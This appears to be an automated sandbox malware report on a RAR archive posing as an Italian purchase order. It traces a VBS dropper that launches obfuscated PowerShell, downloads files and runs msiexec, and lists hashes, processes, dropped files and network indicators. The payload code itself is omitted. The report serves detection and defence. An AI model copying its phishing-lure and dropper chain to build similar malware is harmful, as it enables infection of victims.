File name: ORDINE DI ACQUISTO_34002174.gz

Full analysis: https://app.any.run/tasks/0b2358d8-5dbe-446b-a041-db7d278f4192
Verdict: Malicious activity
Analysis date: May 19, 2025, 11:48:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: arch-scr
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: 104EFA098AE3ADF56777C0EC6E16FBB3
SHA1: EEDB12EED76AB615A0015767002BE498BCEFC4D5
SHA256: 18FA25D9C10AFFBBC2BC53B16839918BF4695319E8D0E25A9CB5B74967FCCB6C
SSDEEP: 768:llyzikrSUz4irtpXn7Nd/zR7CtmmnAvsRIhhvCaVcMNgQcKFflqGz:lkzikWkv7P/NKmmnnIhhvCKcMaIFNqGz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7860)
    • Generic archive extractor

      • WinRAR.exe (PID: 7336)
    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
  • SUSPICIOUS

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7860)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 8160)
      • wscript.exe (PID: 7788)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 8160)
      • wscript.exe (PID: 7788)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 8160)
      • wscript.exe (PID: 7788)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7788)
      • wscript.exe (PID: 8160)
    • The process executes VB scripts

      • WinRAR.exe (PID: 7336)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 7336)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 1348)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 8160)
      • wscript.exe (PID: 7788)
    • Checks proxy server information

      • powershell.exe (PID: 7860)
      • msiexec.exe (PID: 7620)
      • msiexec.exe (PID: 7596)
    • Disables trace logs

      • powershell.exe (PID: 7860)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 7336)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7860)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Manual execution by a user

      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 7620)
      • msiexec.exe (PID: 7596)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1348)
      • powershell.exe (PID: 1764)
    • Creates files or folders in the user directory

      • msiexec.exe (PID: 7620)
      • msiexec.exe (PID: 7596)
    • Reads the software policy settings

      • msiexec.exe (PID: 7620)
      • msiexec.exe (PID: 7596)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 40016
UncompressedSize: 75371
OperatingSystem: Win32
ArchivedFileName: ORDINE DI ACQUISTO_34002174.vbs
All screenshots are available in the full report
Total processes: 149
Monitored processes: 20
Malicious processes: 5
Suspicious processes: 2

Behavior graph

Processes in the graph, in start order ("no specs" as shown in the report):
winrar.exe (no specs), sppextcomobj.exe (no specs), slui.exe (no specs), wscript.exe (no specs), powershell.exe, conhost.exe (no specs), wscript.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), msiexec.exe (no specs), msiexec.exe (no specs), msiexec.exe, msiexec.exe (no specs), msiexec.exe, fixmapi.exe (no specs), fixmapi.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1348
CMD: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 1764
CMD: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 2108
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4220
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4944
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script argument omitted]"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 5968
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7336
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\ORDINE DI ACQUISTO_34002174.gz.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 7456
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 7488
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 7596
CMD: "C:\WINDOWS\SysWOW64\msiexec.exe"
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows® installer
Version: 5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events: 30 227
Read events: 30 217
Write events: 10
Delete events: 0

Modification events

PID | Process | Key | Operation | Name | Value
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 3 | C:\Users\admin\Desktop\preferences.zip
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 2 | C:\Users\admin\Desktop\chromium_ext.zip
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 1 | C:\Users\admin\Desktop\omni_23_10_2024_.zip
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | write | 0 | C:\Users\admin\AppData\Local\Temp\ORDINE DI ACQUISTO_34002174.gz.rar
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | name | 120
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | size | 80
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | type | 120
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | write | mtime | 100
7336 | WinRAR.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids | write | VBSFile |
Executable files: 0
Suspicious files: 6
Text files: 11
Unknown types: 0

Dropped files

PID | Process | Filename | Type
7860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1idhy33n.mfc.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7336 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa7336.14427\ORDINE DI ACQUISTO_34002174.vbs | text
MD5: 7B29C0E97C98BE8F056DCFEF81DC1529
SHA256: 52F801D6485AF94907BE595B32FA95F521A9D8FAF03C23B2D1BDFF6757DBDDD0
7620 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DFFCD3E52A9B2D959A2804E0ED77E3BA_2E95A630F2DD13380B1E8651AB8ED2DB | binary
MD5: 8875A30B8FEDD0319030C405A438111F
SHA256: 7E019BEDA8FE64C5F86C5C9B824E497203BA66A106BBF7385D677CF39ECA78AA
1348 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
MD5: 8E7D26D71A1CAF822C338431F0651251
SHA256: 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
7620 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DFFCD3E52A9B2D959A2804E0ED77E3BA_2E95A630F2DD13380B1E8651AB8ED2DB | binary
MD5: 454D57924959276964E91ED2E4FEA8DD
SHA256: 000AD6315D1F6AB26B560B795944DC601C7E500595F65E8B3DEE5A7CE1752C70
7336 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa7336.15322\ORDINE DI ACQUISTO_34002174.vbs | text
MD5: 7B29C0E97C98BE8F056DCFEF81DC1529
SHA256: 52F801D6485AF94907BE595B32FA95F521A9D8FAF03C23B2D1BDFF6757DBDDD0
7860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vdbf1jjz.weq.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cqhufwuc.svi.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dlx4mcmd.fhu.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7860 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: CAE164A0DEE22BCAD714ED2A58CC397E
SHA256: 14E8A855CF22F13933C3DEEF9ABBDD5A7C22E801F80A6AC6B31EB485FF95090D
HTTP(S) requests: 10
TCP/UDP connections: 27
DNS requests: 18
Threats: 0

HTTP requests

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | | | whitelisted |
| | | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted |
| 5496 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | whitelisted |
| 5496 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | whitelisted |
| 7624 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | | | whitelisted |
| 7620 | msiexec.exe | GET | 200 | 69.192.161.44:80 | http://x1.c.lencr.org/ | unknown | | | whitelisted |
| 7624 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | | | whitelisted |
| 7596 | msiexec.exe | GET | 200 | 69.192.161.44:80 | http://x1.c.lencr.org/ | unknown | | | whitelisted |
| 7620 | msiexec.exe | GET | 200 | 95.101.54.131:80 | http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgVUTXRP3GD61jDYQ3Ez90wEpQ%3D%3D | unknown | | | whitelisted |
| 7596 | msiexec.exe | GET | 200 | 95.101.54.131:80 | http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgVUTXRP3GD61jDYQ3Ez90wEpQ%3D%3D | unknown | | | whitelisted |

Connections

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2104 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 4 | System | 192.168.100.255:137 | | | | whitelisted |
| | | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 5496 | MoUsoCoreWorker.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
| 5496 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| | | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| 4 | System | 192.168.100.255:138 | | | | whitelisted |
| 2112 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| 3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
| 6544 | svchost.exe | 20.190.160.20:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |

DNS requests

| Domain | IP | Reputation |
|---|---|---|
| settings-win.data.microsoft.com | 51.104.136.2, 20.73.194.208 | whitelisted |
| google.com | 142.250.185.206 | whitelisted |
| crl.microsoft.com | 23.216.77.28, 23.216.77.30, 23.216.77.8, 23.216.77.6 | whitelisted |
| www.microsoft.com | 23.35.229.160 | whitelisted |
| client.wns.windows.com | 172.211.123.250 | whitelisted |
| login.live.com | 20.190.160.20, 40.126.32.76, 20.190.160.130, 40.126.32.138, 20.190.160.132, 20.190.160.2, 40.126.32.68, 20.190.160.17 | whitelisted |
| ocsp.digicert.com | 2.17.190.73 | whitelisted |
| mack-concord.hr | 195.29.178.20 | unknown |
| slscr.update.microsoft.com | 4.245.163.56 | whitelisted |
| fe3cr.delivery.mp.microsoft.com | 20.242.39.171 | whitelisted |

Threats

No threats detected
No debug info